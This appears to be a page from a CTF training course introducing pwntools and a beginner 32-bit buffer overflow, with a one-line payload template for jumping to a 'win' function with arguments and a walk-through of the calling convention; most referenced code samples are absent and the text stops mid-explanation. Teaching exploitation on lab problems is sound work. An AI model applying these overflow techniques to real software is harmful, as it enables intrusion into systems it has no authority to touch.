Don't like this style? Click here to change it! blue.css

Welcome .... Click here to logout

pwntools and Baby buffer overflows

OK time to start hacking. Here are today's goals:


pwntools is a python library that acts as a swiss army knife for pwning.

If you can run the line from pwn import * in a python session you're good to go.

If not then follow the instructions at:

Also our pwndocker instructions has pwntools working already.

Here is a random pwntools script from a live CTF problem:

Here is a more useful collection of utilities I find myself using often when hacking:

Baby buffer overflow

OK we get the basic idea of what we need to do right?

In these problems the coder lets us write more than we should into a fixed amount of space.

It looks something like this:

This is the second problem in the zero-to-hero sequence.

Let's solve it together (video will walk through more), I took the time to host it at: nc 11986

Hackers don't call... they jump in

TLDR: payload=b"A"*offset + p32(win_ADDR) + p32(mysteryhere) + p32(argument1) + p32(argument2)

Here's the normal calling convention for 32-bit:

  1. push arg2
  2. push arg1
  3. call subroutine (push RIP then jmp)
  4. push old_rbp
  5. do stuff here
  6. pop old_rbp
  7. ret (pop RIP return address)

Now suppose you are going to buffer overflow:

When you JUMP into a win function there is no pushing of the return address...

BUT the win function still acts like there should be a return address on the stack...

SO all of your arguments are shifted by one address when hacking in this way.

As pseudo-instructions: